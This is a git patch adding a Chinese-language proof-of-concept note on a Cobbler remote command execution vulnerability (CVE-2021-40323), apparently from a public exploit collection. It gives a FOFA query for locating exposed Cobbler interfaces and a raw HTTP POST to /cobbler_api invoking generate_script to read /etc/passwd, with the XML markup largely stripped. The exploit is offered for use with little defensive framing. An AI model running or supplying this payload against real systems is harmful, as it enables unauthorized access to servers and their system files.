From aab6a3bb21ef0f2e8088f42bbbb65b1773e5d9a0 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 27 Mar 2024 10:56:56 +0800 Subject: [PATCH] =?UTF-8?q?Create=20Cobbler=E5=AD=98=E5=9C=A8=E8=BF=9C?= =?UTF-8?q?=E7=A8=8B=E5=91=BD=E4=BB=A4=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?(CVE-2021-40323).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ler存在远程命令执行漏洞(CVE-2021-40323).md | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 Cobbler存在远程命令执行漏洞(CVE-2021-40323).md diff --git a/Cobbler存在远程命令执行漏洞(CVE-2021-40323).md b/Cobbler存在远程命令执行漏洞(CVE-2021-40323).md new file mode 100644 index 0000000..abe8954 --- /dev/null +++ b/Cobbler存在远程命令执行漏洞(CVE-2021-40323).md @@ -0,0 +1,44 @@ +## Cobbler存在远程命令执行漏洞(CVE-2021-40323) + +Cobbler是一款专注于自动化Linux系统安装和配置管理的工具,可帮助管理员快速部署服务器并确保配置一致性,支持多种操作系统和提供多项功能强大的特性,如Kickstart配置、PXE引导、DHCP管理等,提升系统管理效率和可靠性。 + +该产品在3.3.0之前版本存在远程代码执行漏洞,该漏洞源于外部输入数据构造代码段的过程中,网络系统或产品未能正确过滤其中的特殊元素,攻击者可利用该漏洞通过特制的XMLRPC方法记录日志文件以进行模板注入,从而导致日志中毒和远程代码执行。 + +## fofa +``` +"Cobbler Web Interface" +``` + + +## poc +``` +POST /cobbler_api HTTP/1.1 +Host: xxx +Content-Length: 0 +Content-Type: text/xml +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + + + + generate_script + + + + centos6-x86_64 + + + + + + + + + + /etc/passwd + + + + +``` + +![image](https://github.com/wy876/POC/assets/139549762/bbe19773-779d-4591-b957-28cfc9bf8bce)